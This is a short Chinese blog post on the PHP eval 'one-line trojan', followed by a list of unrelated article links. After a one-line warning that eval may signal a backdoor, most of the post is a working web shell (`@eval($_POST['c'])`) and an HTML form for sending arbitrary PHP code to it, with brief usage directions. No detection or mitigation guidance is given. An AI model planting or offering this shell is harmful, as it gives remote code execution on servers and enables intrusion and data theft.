php eval函数一句话木马代码
作者:hebedich 时间:2024-11-20 03:38:46
eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>
以上所述就是本文的全部内容了,希望大家能够喜欢。
标签:php,eval函数,一句话木马
0
投稿
猜你喜欢
Data URI 和 MHTML
2009-08-16 16:19:00
将mysql转换到oracle必须了解的50件事
2010-07-05 12:15:00
pandas读取Excel批量转换时间戳的实践
2023-04-20 12:47:07
Python中loguru日志库的使用
2023-03-02 13:24:27
Debian中完全卸载MySQL的方法
2024-01-25 19:25:34
对python函数签名的方法详解
2021-09-22 10:14:25
Python自动化实战之接口请求的实现
2021-01-15 15:44:58
使用Python读写及压缩和解压缩文件的示例
2023-08-30 17:42:52
nodeJS express路由学习req.body与req.query方法实例详解
2024-06-05 09:52:34
Python Django框架url反向解析实现动态生成对应的url链接示例
2021-08-23 04:30:38
Python Pandas 对列/行进行选择,增加,删除操作
2022-10-29 03:55:52
微信小程序开发注意指南和优化实践(小结)
2024-04-17 10:38:05
MHA实现mysql主从数据库手动切换的方法
2024-01-25 22:36:23
Python要求O(n)复杂度求无序列表中第K的大元素实例
2023-07-30 13:18:01
MySQL中查询的有关英文字母大小写问题的分析
2024-01-27 05:59:47
python opencv将图片转为灰度图的方法示例
2021-03-24 22:22:54
Python实现队列的方法
2023-08-29 06:45:30
Python定制类你不知道的魔术方法
2022-10-26 11:26:40
Jupyter Notebook内使用argparse报错的解决方案
2023-05-08 21:43:52
互联网产品设计师自我介绍
2009-04-16 12:45:00